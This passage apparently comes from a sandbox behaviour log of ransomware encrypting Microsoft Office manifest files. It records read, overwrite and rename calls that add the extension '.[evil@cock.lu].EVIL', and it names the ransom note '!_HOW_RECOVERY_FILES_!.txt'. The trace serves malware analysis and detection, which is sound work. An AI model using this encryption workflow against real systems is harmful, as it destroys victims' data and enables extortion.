_File=0x7ffc020ee2a0) returned 51 [0102.871] __uncaught_exception () returned 0x84b1160800 [0102.871] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.872] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.872] ??_V@YAXPEAX@Z () returned 0x1 [0102.876] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.876] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.876] wcsstr (_Str="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.876] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 105 [0102.876] wcscmp (_String1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.876] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 0x0 [0102.876] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 0x69 [0102.876] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.878] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x5b0, lpOverlapped=0x0) returned 1 [0102.881] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.881] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.881] _errno () returned 0x84b1160840 [0102.881] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.881] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x5c0, lpOverlapped=0x0) returned 1 [0102.881] CloseHandle (hObject=0x1a0) returned 1 [0102.881] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.882] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.882] __uncaught_exception () returned 0x84b1160800 [0102.882] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.882] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.883] ??_V@YAXPEAX@Z () returned 0x1 [0102.886] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.886] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.886] wcsstr (_Str="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.886] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 105 [0102.886] wcscmp (_String1="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.886] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 0x0 [0102.886] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 0x69 [0102.886] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.888] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x627, lpOverlapped=0x0) returned 1 [0102.906] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.906] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.906] _errno () returned 0x84b1160840 [0102.906] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.906] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x640, lpOverlapped=0x0) returned 1 [0102.906] CloseHandle (hObject=0x1a0) returned 1 [0102.906] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.907] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.907] __uncaught_exception () returned 0x84b1160800 [0102.907] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.907] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.908] ??_V@YAXPEAX@Z () returned 0x1 [0102.911] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.911] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.911] wcsstr (_Str="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.911] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 105 [0102.911] wcscmp (_String1="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.911] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 0x0 [0102.911] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 0x69 [0102.911] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.913] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x50a, lpOverlapped=0x0) returned 1 [0102.916] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.916] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.916] _errno () returned 0x84b1160840 [0102.916] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.916] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x520, lpOverlapped=0x0) returned 1 [0102.917] CloseHandle (hObject=0x1a0) returned 1 [0102.917] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.917] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.917] __uncaught_exception () returned 0x84b1160800 [0102.917] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.917] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.918] ??_V@YAXPEAX@Z () returned 0x1 [0102.921] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.921] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.921] wcsstr (_Str="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.921] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 105 [0102.921] wcscmp (_String1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.921] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 0x0 [0102.922] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 0x69 [0102.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.923] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fde1e0*=0xf6d, lpOverlapped=0x0) returned 1 [0102.941] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.941] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.941] _errno () returned 0x84b1160840 [0102.941] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.941] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0xf80, lpOverlapped=0x0) returned 1 [0102.942] CloseHandle (hObject=0x1a0) returned 1 [0102.942] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.942] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.942] __uncaught_exception () returned 0x84b1160800 [0102.942] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.942] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.943] ??_V@YAXPEAX@Z () returned 0x1 [0102.946] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.946] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.946] wcsstr (_Str="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.946] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 105 [0102.946] wcscmp (_String1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.946] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 0x0 [0102.946] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 0x69 [0102.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0102.948] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x56a, lpOverlapped=0x0) returned 1 [0102.950] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.950] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0102.950] _errno () returned 0x84b1160840 [0102.950] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.950] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x580, lpOverlapped=0x0) returned 1 [0102.951] CloseHandle (hObject=0x1a0) returned 1 [0102.951] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0102.951] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0102.951] __uncaught_exception () returned 0x84b1160800 [0102.951] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0102.951] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0102.995] ??_V@YAXPEAX@Z () returned 0x1 [0102.998] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0102.998] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0102.998] wcsstr (_Str="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0102.998] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 105 [0102.998] wcscmp (_String1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0102.999] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 0x0 [0102.999] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 0x69 [0102.999] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0103.001] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x50a, lpOverlapped=0x0) returned 1 [0103.003] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.003] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.003] _errno () returned 0x84b1160840 [0103.003] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.003] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x520, lpOverlapped=0x0) returned 1 [0103.003] CloseHandle (hObject=0x1a0) returned 1 [0103.003] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.004] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.004] __uncaught_exception () returned 0x84b1160800 [0103.004] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.004] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0103.004] ??_V@YAXPEAX@Z () returned 0x1 [0103.007] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0103.007] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.007] wcsstr (_Str="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.007] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 105 [0103.007] wcscmp (_String1="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.007] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 0x0 [0103.008] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 0x69 [0103.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0103.010] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x50a, lpOverlapped=0x0) returned 1 [0103.020] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.020] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.020] _errno () returned 0x84b1160840 [0103.020] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.020] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x520, lpOverlapped=0x0) returned 1 [0103.020] CloseHandle (hObject=0x1a0) returned 1 [0103.020] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.021] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.021] __uncaught_exception () returned 0x84b1160800 [0103.021] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.022] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0103.023] ??_V@YAXPEAX@Z () returned 0x1 [0103.026] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0103.026] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.026] wcsstr (_Str="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.026] _snwprintf (in: 